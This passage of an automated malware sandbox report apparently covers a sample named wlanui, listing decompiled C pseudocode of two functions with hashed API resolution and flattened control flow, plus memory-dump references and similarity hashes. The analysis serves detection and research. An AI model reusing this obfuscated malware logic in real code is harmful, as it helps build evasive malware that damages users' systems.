                                                        0x0048552c
                                                        0x00485531
                                                        0x0048553a
                                                        0x0048553f
                                                        0x00485547
                                                        0x0048554b
                                                        0x00485550
                                                        0x00485556
                                                        0x0048555d
                                                        0x00000000
                                                        0x00000000
                                                        0x0048555f
                                                        0x00000000
                                                        0x0048555d
                                                        0x00485563
                                                        0x00485563
                                                        0x00485567
                                                        0x0048556e
                                                        0x00485586
                                                        0x00485586
                                                        0x004855a1
                                                        0x004855a1
                                                        0x004855ac

                                                        APIs
                                                        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004855A1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 515e3f2e9693ebb60207db5cc9530fe0dee6e75f38d8061a58cef71e1d76c4e5
                                                        • Instruction ID: 18cfa132bb95a1ee5c4228edd75c16cc5b44f6ce73e1066e7d56b272b379a90a
                                                        • Opcode Fuzzy Hash: 515e3f2e9693ebb60207db5cc9530fe0dee6e75f38d8061a58cef71e1d76c4e5
                                                        • Instruction Fuzzy Hash: 6C117C70600300ABE724FF66CC42B7E77E6AF90B44F444C2EA2458B2D4FBB8D944975A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00460F08
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00460F3E
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00460F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 004602F6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335360642.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_460000_wlanui.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: 25c2746c31fe70e8e70002dbc77c117d8572d170fbf53ed55c9548f2e95cc693
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: 845149B1900268ABDB20DF64DD84BDEB778EF88704F0045DAF509B7250EB785A85CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 58%
                                                        			E00482230(signed int* __ecx, signed int* __edx) {
                                                        				char _v25;
                                                        				char _v108;
                                                        				char _v112;
                                                        				char _v116;
                                                        				signed int _v120;
                                                        				char _v124;
                                                        				signed int _v128;
                                                        				signed int* _v132;
                                                        				signed int* _v136;
                                                        				signed int* _v140;
                                                        				signed int* _v144;
                                                        				signed int* _v148;
                                                        				signed int* _v152;
                                                        				signed int* _v156;
                                                        				signed int* _v160;
                                                        				signed int* _v164;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				signed int* _t61;
                                                        				signed int _t64;
                                                        				signed int _t68;
                                                        				intOrPtr _t71;
                                                        				signed int _t79;
                                                        				signed int _t80;
                                                        				signed int _t82;
                                                        				signed int _t83;
                                                        				intOrPtr _t86;
                                                        				signed int _t87;
                                                        				intOrPtr _t93;
                                                        				signed int _t98;
                                                        				signed int _t104;
                                                        				signed int* _t105;
                                                        				signed int _t106;
                                                        				signed int _t107;
                                                        				signed int _t111;
                                                        				signed int _t112;
                                                        				intOrPtr* _t117;
                                                        				signed int* _t133;
                                                        				signed int _t137;
                                                        				signed int _t143;
                                                        				signed int _t144;
                                                        				void* _t145;
                                                        				signed int _t146;
                                                        				signed int _t147;
                                                        				signed int _t149;
                                                        				signed int _t151;
                                                        				signed int** _t153;
                                                        				void* _t155;
                                                        				void* _t156;
                                                        
                                                        				_t105 = __ecx;
                                                        				_t153 =  &_v140;
                                                        				_t104 = _v120;
                                                        				_t151 = _v120;
                                                        				_v132 = __edx;
                                                        				_t146 = 0x3ea70a1;
                                                        				_v136 = __ecx;
                                                        				_v128 = 0;
                                                        				while(1) {
                                                        					L1:
                                                        					_t61 = _v140;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t155 = _t146 - 0xf573de9;
                                                        							if(_t155 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t155 == 0) {
                                                        								_t106 =  *0x48df54;
                                                        								_v112 = 0x14;
                                                        								__eflags = _t106;
                                                        								if(_t106 == 0) {
                                                        									_t106 = E00483E60(_t104, E00483F00(0x26f5757c), 0x954f2ac2, _t151);
                                                        									 *0x48df54 = _t106;
                                                        								}
                                                        								_t20 = _t104 + 0x60; // 0x60
                                                        								_t64 =  *_t106(_v124, 2, _t20,  &_v112, 0);
                                                        								_t105 = _v156;
                                                        								__eflags = _t64;
                                                        								_t61 = _v160;
                                                        								if(_t64 != 0) {
                                                        									_t146 = 0x12d660c6;
                                                        									_v148 = 1;
                                                        									while(1) {
                                                        										L1:
                                                        										_t61 = _v140;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        								continue;
                                                        							} else {
                                                        								_t156 = _t146 - 0x7187f49;
                                                        								if(_t156 > 0) {
                                                        									__eflags = _t146 - 0xd55ea35;
                                                        									if(_t146 != 0xd55ea35) {
                                                        										goto L8;
                                                        									} else {
                                                        										_t68 =  *0x48e1e0;
                                                        										_t149 = _t105[1];
                                                        										_t143 =  *_t105;
                                                        										__eflags = _t68;
                                                        										if(_t68 == 0) {
                                                        											_t68 = E00483E60(_t104, E00483F00(0xc6fbcd74), 0x624eee2, _t151);
                                                        											 *0x48e1e0 = _t68;
                                                        										}
                                                        										 *_t68(_v140, _t143, _t149);
                                                        										_t105 = _v136;
                                                        										_t153 =  &(_t153[3]);
                                                        										_t133 = _v132;
                                                        										_t146 = 0x7187f49;
                                                        										while(1) {
                                                        											L1:
                                                        											_t61 = _v140;
                                                        											goto L2;
                                                        										}
                                                        									}
                                                        								} else {
                                                        									if(_t156 == 0) {
                                                        										_t107 =  *0x48db58;
                                                        										__eflags = _t107;
                                                        										if(_t107 == 0) {
                                                        											_t107 = E00483E60(_t104, E00483F00(0x26f5757c), 0x933eabe2, _t151);
                                                        											_t61 = _v140;
                                                        											 *0x48db58 = _t107;
                                                        										}
                                                        										_t71 =  *0x48e544; // 0x314640
                                                        										_t11 = _t71 + 0x10; // 0x2d80b20
                                                        										 *_t107( *_t11, _v124, 1, 0, _t61,  &_v120, _t151);
                                                        										_t105 = _v164;
                                                        										_t133 = _v160;
                                                        										asm("sbb esi, esi");
                                                        										_t146 = (_t146 & 0x1dfee662) + 0x12d660c6;
                                                        										while(1) {
                                                        											L1:
                                                        											_t61 = _v140;
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t146 == 0x3ea70a1) {
                                                        											_t146 = 0x3272bd97;
                                                        											continue;
                                                        										} else {
                                                        											if(_t146 == 0x715b39b) {
                                                        												_t144 = _v128;
                                                        												__eflags = _t144;
                                                        												if(_t144 == 0) {
                                                        													E00484220(_t104,  *_t133);
                                                        												}
                                                        												return _t144;
                                                        											} else {
                                                        												goto L8;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L51:
                                                        						}
                                                        						__eflags = _t146 - 0x30d54728;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t146 - 0x3272bd97;
                                                        							if(_t146 != 0x3272bd97) {
                                                        								goto L8;
                                                        							} else {
                                                        								_t79 = _t105[1] + 1;
                                                        								__eflags = _t79 & 0x0000000f;
                                                        								if((_t79 & 0x0000000f) != 0) {
                                                        									_t79 = (_t79 & 0xfffffff0) + 0x10;
                                                        									__eflags = _t79;
                                                        								}
                                                        								_t147 = _t79 + 0x74;
                                                        								_t80 =  *0x48e494;
                                                        								_t133[1] = _t147;
                                                        								__eflags = _t80;
                                                        								if(_t80 == 0) {
                                                        									_t80 = E00483E60(_t104, E00483F00(0x9bab0b12), 0x7facde30, _t151);
                                                        									 *0x48e494 = _t80;
                                                        								}
                                                        								_t145 =  *_t80();
                                                        								_t82 =  *0x48dd18;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t82 = E00483E60(_t104, E00483F00(0x9bab0b12), 0x9ff0609c, _t151);
                                                        									 *0x48dd18 = _t82;
                                                        								}
                                                        								_t83 =  *_t82(_t145, 8, _t147);
                                                        								_t133 = _v144;
                                                        								_t104 = _t83;
                                                        								 *_t133 = _t104;
                                                        								__eflags = _t104;
                                                        								if(_t104 == 0) {
                                                        									break;
                                                        								} else {
                                                        									_t53 = _t104 + 0x74; // 0x74
                                                        									_t61 = _t53;
                                                        									_t146 = 0xffd55eb;
                                                        									_v152 = _t61;
                                                        									_t151 =  &_v116;
                                                        									_v132 = _v148[1];
                                                        									_t105 = _v148;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t111 =  *0x48e120;
                                                        								_v116 = 0x6c;
                                                        								__eflags = _t111;
                                                        								if(_t111 == 0) {
                                                        									_t111 = E00483E60(_t104, E00483F00(0x26f5757c), 0xa7de3148, _t151);
                                                        									 *0x48e120 = _t111;
                                                        								}
                                                        								_t86 =  *0x48e544; // 0x314640
                                                        								_t36 = _t86 + 8; // 0x2d809c8
                                                        								_t37 = _t86 + 0x10; // 0x2d80b20
                                                        								_t87 =  *_t111( *_t37,  *_t36, 1, 0x40,  &_v108,  &_v116);
                                                        								__eflags = _t87;
                                                        								if(_t87 == 0) {
                                                        									_t105 = _v160;
                                                        									_t146 = 0x12d660c6;
                                                        									_t133 = _v156;
                                                        									goto L1;
                                                        								} else {
                                                        									_t117 =  &_v25;
                                                        									_t137 = _t104;
                                                        									do {
                                                        										_t137 = _t137 + 1;
                                                        										 *((char*)(_t137 - 1)) =  *_t117;
                                                        										_t117 = _t117 - 1;
                                                        										__eflags = _t117 -  &_v120;
                                                        									} while (_t117 >=  &_v120);
                                                        									_t105 = _v160;
                                                        									_t146 = 0xf573de9;
                                                        									_t133 = _v156;
                                                        									while(1) {
                                                        										L1:
                                                        										_t61 = _v140;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							} else {
                                                        								__eflags = _t146 - 0xffd55eb;
                                                        								if(_t146 == 0xffd55eb) {
                                                        									_t112 =  *0x48dff0;
                                                        									__eflags = _t112;
                                                        									if(_t112 == 0) {
                                                        										_t112 = E00483E60(_t104, E00483F00(0x26f5757c), 0xc7ccd5be, _t151);
                                                        										 *0x48dff0 = _t112;
                                                        									}
                                                        									_t93 =  *0x48e544; // 0x314640
                                                        									_t30 = _t93 + 0x1c; // 0x2d80df0
                                                        									 *_t112( *_t30, 0, 0,  &_v124);
                                                        									_t105 = _v152;
                                                        									_t133 = _v148;
                                                        									asm("sbb esi, esi");
                                                        									_t146 = (_t146 & 0x0640369a) + 0x715b39b;
                                                        									while(1) {
                                                        										L1:
                                                        										_t61 = _v140;
                                                        										goto L2;
                                                        									}
                                                        								} else {
                                                        									__eflags = _t146 - 0x12d660c6;
                                                        									if(_t146 != 0x12d660c6) {
                                                        										goto L8;
                                                        									} else {
                                                        										_t98 =  *0x48e308;
                                                        										__eflags = _t98;
                                                        										if(_t98 == 0) {
                                                        											_t98 = E00483E60(_t104, E00483F00(0x26f5757c), 0xd8b73a4f, _t151);
                                                        											 *0x48e308 = _t98;
                                                        										}
                                                        										 *_t98(_v124);
                                                        										_t105 = _v140;
                                                        										_t146 = 0x715b39b;
                                                        										_t133 = _v136;
                                                        										while(1) {
                                                        											L1:
                                                        											_t61 = _v140;
                                                        											goto L2;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L51;
                                                        						L8:
                                                        					} while (_t146 != 0x21395ef6);
                                                        					return _v128;
                                                        					goto L51;
                                                        				}
                                                        			}




















































                                                        0x00482230
                                                        0x00482230
                                                        0x00482237
                                                        0x0048223e
                                                        0x00482244
                                                        0x00482248
                                                        0x0048224d
                                                        0x00482251
                                                        0x00482255
                                                        0x00482255
                                                        0x00482255
                                                        0x00482260
                                                        0x00482260
                                                        0x00482260
                                                        0x00482260
                                                        0x00482266
                                                        0x00000000
                                                        0x00000000
                                                        0x0048226c
                                                        0x00482366
                                                        0x0048236c
                                                        0x00482374
                                                        0x00482376
                                                        0x0048238e
                                                        0x00482390
                                                        0x00482390
                                                        0x0048239d
                                                        0x004823a7
                                                        0x004823a9
                                                        0x004823ad
                                                        0x004823af
                                                        0x004823b7
                                                        0x004823bd
                                                        0x004823c2
                                                        0x00482255
                                                        0x00482255
                                                        0x00482255
                                                        0x00000000
                                                        0x00482255
                                                        0x00482255
                                                        0x00000000
                                                        0x00482272
                                                        0x00482272
                                                        0x00482278
                                                        0x00482314
                                                        0x0048231a
                                                        0x00000000
                                                        0x00482320
                                                        0x00482320
                                                        0x00482325
                                                        0x00482328
                                                        0x0048232a
                                                        0x0048232c
                                                        0x0048233f
                                                        0x00482344
                                                        0x00482344
                                                        0x0048234f
                                                        0x00482351
                                                        0x00482355
                                                        0x00482358
                                                        0x0048235c
                                                        0x00482255
                                                        0x00482255
                                                        0x00482255
                                                        0x00000000
                                                        0x00482255
                                                        0x00482255
                                                        0x0048227e
                                                        0x0048227e
                                                        0x004822b2
                                                        0x004822b8
                                                        0x004822ba
                                                        0x004822d2
                                                        0x004822d4
                                                        0x004822d8
                                                        0x004822d8
                                                        0x004822e5
                                                        0x004822f2
                                                        0x004822f5
                                                        0x004822f7
                                                        0x004822fd
                                                        0x00482301
                                                        0x00482309
                                                        0x00482255
                                                        0x00482255
                                                        0x00482255
                                                        0x00000000
                                                        0x00482255
                                                        0x00482280
                                                        0x00482286
                                                        0x004822ab
                                                        0x00000000
                                                        0x00482288
                                                        0x0048228e
                                                        0x004825be
                                                        0x004825c2
                                                        0x004825c4
                                                        0x004825c8
                                                        0x004825c8
                                                        0x004825d9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0048228e
                                                        0x00482286
                                                        0x0048227e
                                                        0x00482278
                                                        0x00000000
                                                        0x0048226c
                                                        0x004823cf
                                                        0x004823d5
                                                        0x00482516
                                                        0x0048251c
                                                        0x00000000
                                                        0x00482522
                                                        0x00482525
                                                        0x00482526
                                                        0x00482528
                                                        0x0048252d
                                                        0x0048252d
                                                        0x0048252d
                                                        0x00482530
                                                        0x00482533
                                                        0x00482538
                                                        0x0048253b
                                                        0x0048253d
                                                        0x00482550
                                                        0x00482555
                                                        0x00482555
                                                        0x0048255c
                                                        0x0048255e
                                                        0x00482563
                                                        0x00482565
                                                        0x00482578
                                                        0x0048257d
                                                        0x0048257d
                                                        0x00482586
                                                        0x00482588
                                                        0x0048258c
                                                        0x0048258e
                                                        0x00482590
                                                        0x00482592
                                                        0x00000000
                                                        0x00482598
                                                        0x0048259c
                                                        0x0048259c
                                                        0x004825a2
                                                        0x004825a7
                                                        0x004825ab
                                                        0x004825b1
                                                        0x004825b5
                                                        0x00000000
                                                        0x004825b5
                                                        0x00482592
                                                        0x004823db
                                                        0x004823db
                                                        0x00482489
                                                        0x0048248f
                                                        0x00482497
                                                        0x00482499
                                                        0x004824b1
                                                        0x004824b3
                                                        0x004824b3
                                                        0x004824c3
                                                        0x004824cc
                                                        0x004824cf
                                                        0x004824d2
                                                        0x004824d4
                                                        0x004824d6
                                                        0x00482504
                                                        0x00482508
                                                        0x0048250d
                                                        0x00000000
                                                        0x004824d8
                                                        0x004824d8
                                                        0x004824df
                                                        0x004824e1
                                                        0x004824e3
                                                        0x004824e6
                                                        0x004824e9
                                                        0x004824ee
                                                        0x004824ee
                                                        0x004824f2
                                                        0x004824f6
                                                        0x004824fb
                                                        0x00482255
                                                        0x00482255
                                                        0x00482255
                                                        0x00000000
                                                        0x00482255
                                                        0x00482255
                                                        0x004823e1
                                                        0x004823e1
                                                        0x004823e7
                                                        0x00482431
                                                        0x00482437
                                                        0x00482439
                                                        0x00482451
                                                        0x00482453
                                                        0x00482453
                                                        0x0048245e
                                                        0x00482467
                                                        0x0048246a
                                                        0x0048246c
                                                        0x00482472
                                                        0x00482476
                                                        0x0048247e
                                                        0x00482255
                                                        0x00482255
                                                        0x00482255
                                                        0x00000000
                                                        0x00482255
                                                        0x004823e9
                                                        0x004823e9
                                                        0x004823ef
                                                        0x00000000
                                                        0x004823f5
                                                        0x004823f5
                                                        0x004823fa
                                                        0x004823fc
                                                        0x0048240f
                                                        0x00482414
                                                        0x00482414
                                                        0x0048241d
                                                        0x0048241f
                                                        0x00482423
                                                        0x00482428
                                                        0x00482255
                                                        0x00482255
                                                        0x00482255
                                                        0x00000000
                                                        0x00482255
                                                        0x00482255
                                                        0x004823ef
                                                        0x004823e7
                                                        0x004823db
                                                        0x00000000
                                                        0x00482294
                                                        0x00482294
                                                        0x004822aa
                                                        0x00000000
                                                        0x004822aa

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 5U$@F1$l
                                                        • API String ID: 0-329375996
                                                        • Opcode ID: 2913eb9096e6bfb1d66e7a90ed372d52c118e5953ec7faea38765083ee6d7f4a
                                                        • Instruction ID: 68dec84328e603f6315ea457c199c3590476e192ab55e4e458d336180c78e4ab
                                                        • Opcode Fuzzy Hash: 2913eb9096e6bfb1d66e7a90ed372d52c118e5953ec7faea38765083ee6d7f4a
                                                        • Instruction Fuzzy Hash: 5091F731A043028BCB18FF59DA90A2F77E2BB88704F140C6EF95597391E738DD058B9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E00481FC0(intOrPtr* __ecx, intOrPtr* __edx) {
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t20;
                                                        				intOrPtr _t23;
                                                        				signed int _t24;
                                                        				intOrPtr* _t29;
                                                        				intOrPtr* _t33;
                                                        				intOrPtr* _t36;
                                                        				signed int _t37;
                                                        				intOrPtr* _t41;
                                                        				intOrPtr* _t45;
                                                        				intOrPtr* _t48;
                                                        				intOrPtr _t50;
                                                        				intOrPtr _t56;
                                                        				intOrPtr* _t73;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr _t76;
                                                        				intOrPtr _t77;
                                                        				intOrPtr* _t78;
                                                        				void* _t79;
                                                        				void* _t81;
                                                        				void* _t82;
                                                        
                                                        				_t20 = 0x2fa233da;
                                                        				_t48 = __edx;
                                                        				_t78 = __ecx;
                                                        				_t75 = 0;
                                                        				while(1) {
                                                        					L1:
                                                        					_t76 =  *((intOrPtr*)(_t79 + 0x14));
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t81 = _t20 - 0x12f3165e;
                                                        							if(_t81 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t81 == 0) {
                                                        								_t29 =  *0x48dd24; // 0x0
                                                        								__eflags = _t29;
                                                        								if(_t29 == 0) {
                                                        									_t29 = E00483E60(_t48, E00483F00(0x26f5757c), 0x56a553d3, _t78);
                                                        									 *0x48dd24 = _t29;
                                                        								}
                                                        								_t50 =  *0x48e544; // 0x314640
                                                        								_t14 = _t50 + 8; // 0x2d809c8
                                                        								__eflags =  *_t29( *((intOrPtr*)(_t79 + 0x24)), _t76, 0x60,  *_t14, 0, 0);
                                                        								_t20 = 0x317ab9d;
                                                        								_t75 =  !=  ? 1 : _t75;
                                                        								continue;
                                                        							} else {
                                                        								_t82 = _t20 - 0x58a511f;
                                                        								if(_t82 > 0) {
                                                        									__eflags = _t20 - 0x5f533d5;
                                                        									if(_t20 == 0x5f533d5) {
                                                        										__eflags = _t75;
                                                        										if(_t75 == 0) {
                                                        											E00484220(_t48,  *_t48);
                                                        										}
                                                        										goto L40;
                                                        									} else {
                                                        										__eflags = _t20 - 0xecfc0ca;
                                                        										if(_t20 != 0xecfc0ca) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t33 =  *0x48e1e0;
                                                        											_t77 =  *_t48;
                                                        											__eflags = _t33;
                                                        											if(_t33 == 0) {
                                                        												_t33 = E00483E60(_t48, E00483F00(0xc6fbcd74), 0x624eee2, _t78);
                                                        												 *0x48e1e0 = _t33;
                                                        											}
                                                        											 *_t33(_t77,  *((intOrPtr*)(_t79 + 0x20)),  *((intOrPtr*)(_t79 + 0x18)));
                                                        											_t79 = _t79 + 0xc;
                                                        											_t20 = 0x225c46c1;
                                                        											goto L1;
                                                        										}
                                                        									}
                                                        								} else {
                                                        									if(_t82 == 0) {
                                                        										_t36 =  *0x48dff0;
                                                        										__eflags = _t36;
                                                        										if(_t36 == 0) {
                                                        											_t36 = E00483E60(_t48, E00483F00(0x26f5757c), 0xc7ccd5be, _t78);
                                                        											 *0x48dff0 = _t36;
                                                        										}
                                                        										_t56 =  *0x48e544; // 0x314640
                                                        										_t11 = _t56 + 0x1c; // 0x2d80df0
                                                        										_t37 =  *_t36( *_t11, 0, 0, _t79 + 0x10);
                                                        										asm("sbb eax, eax");
                                                        										_t20 = ( ~_t37 & 0x08da8cf5) + 0x5f533d5;
                                                        										continue;
                                                        									} else {
                                                        										if(_t20 == 0xc0acb) {
                                                        											 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t78 + 4)) + 0xffffff8c;
                                                        											_t41 = E004842C0(_t48,  *((intOrPtr*)(_t78 + 4)) + 0xffffff8c);
                                                        											 *_t48 = _t41;
                                                        											__eflags = _t41;
                                                        											if(_t41 == 0) {
                                                        												L40:
                                                        												return _t75;
                                                        											} else {
                                                        												_t76 =  *_t78;
                                                        												 *((intOrPtr*)(_t79 + 0x14)) = _t76;
                                                        												 *((intOrPtr*)(_t79 + 0x1c)) = _t76 + 0x74;
                                                        												 *((intOrPtr*)(_t79 + 0x18)) =  *((intOrPtr*)(_t78 + 4)) - 0x74;
                                                        												_t20 = 0x58a511f;
                                                        												continue;
                                                        											}
                                                        										} else {
                                                        											if(_t20 != 0x317ab9d) {
                                                        												goto L36;
                                                        											} else {
                                                        												_t45 =  *0x48e308;
                                                        												if(_t45 == 0) {
                                                        													_t45 = E00483E60(_t48, E00483F00(0x26f5757c), 0xd8b73a4f, _t78);
                                                        													 *0x48e308 = _t45;
                                                        												}
                                                        												 *_t45( *((intOrPtr*)(_t79 + 0x10)));
                                                        												_t20 = 0x5f533d5;
                                                        												continue;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L41:
                                                        						}
                                                        						__eflags = _t20 - 0x2fa233da;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t20 - 0x349446de;
                                                        							if(_t20 != 0x349446de) {
                                                        								goto L36;
                                                        							} else {
                                                        								_t20 = 0xc0acb;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t20 = 0x21b6ea48;
                                                        								goto L2;
                                                        							} else {
                                                        								__eflags = _t20 - 0x21b6ea48;
                                                        								if(_t20 == 0x21b6ea48) {
                                                        									__eflags =  *((intOrPtr*)(_t78 + 4)) - 0x74;
                                                        									if( *((intOrPtr*)(_t78 + 4)) < 0x74) {
                                                        										goto L40;
                                                        									} else {
                                                        										_t20 = 0x349446de;
                                                        										goto L2;
                                                        									}
                                                        								} else {
                                                        									__eflags = _t20 - 0x225c46c1;
                                                        									if(_t20 != 0x225c46c1) {
                                                        										goto L36;
                                                        									} else {
                                                        										_t73 =  *0x48deb8; // 0x0
                                                        										__eflags = _t73;
                                                        										if(_t73 == 0) {
                                                        											_t73 = E00483E60(_t48, E00483F00(0x26f5757c), 0x3174712a, _t78);
                                                        											 *0x48deb8 = _t73;
                                                        										}
                                                        										_t23 =  *0x48e544; // 0x314640
                                                        										_t18 = _t23 + 0x10; // 0x2d80b20
                                                        										_t24 =  *_t73( *_t18,  *((intOrPtr*)(_t79 + 0x20)), 1, 0,  *_t48, _t48 + 4);
                                                        										asm("sbb eax, eax");
                                                        										_t20 = ( ~_t24 & 0x0fdb6ac1) + 0x317ab9d;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L41;
                                                        						L36:
                                                        						__eflags = _t20 - 0x22073c7b;
                                                        					} while (_t20 != 0x22073c7b);
                                                        					return _t75;
                                                        					goto L41;
                                                        				}
                                                        			}

























                                                        0x00481fc3
                                                        0x00481fcc
                                                        0x00481fce
                                                        0x00481fd0
                                                        0x00481fd2
                                                        0x00481fd2
                                                        0x00481fd2
                                                        0x00481fd6
                                                        0x00481fe0
                                                        0x00481fe0
                                                        0x00481fe0
                                                        0x00481fe0
                                                        0x00481fe5
                                                        0x00000000
                                                        0x00000000
                                                        0x00481feb
                                                        0x0048211a
                                                        0x0048211f
                                                        0x00482121
                                                        0x00482134
                                                        0x00482139
                                                        0x00482139
                                                        0x0048213e
                                                        0x00482148
                                                        0x00482154
                                                        0x0048215b
                                                        0x00482160
                                                        0x00000000
                                                        0x00481ff1
                                                        0x00481ff1
                                                        0x00481ff6
                                                        0x004820c6
                                                        0x004820cb
                                                        0x00482212
                                                        0x00482214
                                                        0x00482218
                                                        0x00482218
                                                        0x00000000
                                                        0x004820d1
                                                        0x004820d1
                                                        0x004820d6
                                                        0x00000000
                                                        0x004820dc
                                                        0x004820dc
                                                        0x004820e1
                                                        0x004820e3
                                                        0x004820e5
                                                        0x004820f8
                                                        0x004820fd
                                                        0x004820fd
                                                        0x0048210b
                                                        0x0048210d
                                                        0x00482110
                                                        0x00000000
                                                        0x00482110
                                                        0x004820d6
                                                        0x00481ffc
                                                        0x00481ffc
                                                        0x0048207b
                                                        0x00482080
                                                        0x00482082
                                                        0x00482095
                                                        0x0048209a
                                                        0x0048209a
                                                        0x004820a4
                                                        0x004820ae
                                                        0x004820b1
                                                        0x004820b5
                                                        0x004820bc
                                                        0x00000000
                                                        0x00481ffe
                                                        0x00482003
                                                        0x00482047
                                                        0x0048204a
                                                        0x0048204f
                                                        0x00482051
                                                        0x00482053
                                                        0x0048221d
                                                        0x00482226
                                                        0x00482059
                                                        0x00482059
                                                        0x0048205c
                                                        0x00482063
                                                        0x0048206d
                                                        0x00482071
                                                        0x00000000
                                                        0x00482071
                                                        0x00482005
                                                        0x0048200a
                                                        0x00000000
                                                        0x00482010
                                                        0x00482010
                                                        0x00482017
                                                        0x0048202a
                                                        0x0048202f
                                                        0x0048202f
                                                        0x00482038
                                                        0x0048203a
                                                        0x00000000
                                                        0x0048203a
                                                        0x0048200a
                                                        0x00482003
                                                        0x00481ffc
                                                        0x00481ff6
                                                        0x00000000
                                                        0x00481feb
                                                        0x00482168
                                                        0x0048216d
                                                        0x004821ec
                                                        0x004821f1
                                                        0x00000000
                                                        0x004821f3
                                                        0x004821f3
                                                        0x00000000
                                                        0x004821f3
                                                        0x0048216f
                                                        0x0048216f
                                                        0x004821e2
                                                        0x00000000
                                                        0x00482171
                                                        0x00482171
                                                        0x00482176
                                                        0x004821d2
                                                        0x004821d6
                                                        0x00000000
                                                        0x004821d8
                                                        0x004821d8
                                                        0x00000000
                                                        0x004821d8
                                                        0x00482178
                                                        0x00482178
                                                        0x0048217d
                                                        0x00000000
                                                        0x0048217f
                                                        0x0048217f
                                                        0x00482185
                                                        0x00482187
                                                        0x0048219f
                                                        0x004821a1
                                                        0x004821a1
                                                        0x004821a7
                                                        0x004821ba
                                                        0x004821bd
                                                        0x004821c1
                                                        0x004821c8
                                                        0x00000000
                                                        0x004821c8
                                                        0x0048217d
                                                        0x00482176
                                                        0x0048216f
                                                        0x00000000
                                                        0x004821fd
                                                        0x004821fd
                                                        0x004821fd
                                                        0x00482211
                                                        0x00000000
                                                        0x00482211

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *qt1$@F1
                                                        • API String ID: 0-3813603737
                                                        • Opcode ID: 9462cd8e005c782a603937dcbc04c46934b1a3329fafc9beea68d9da4e4c480d
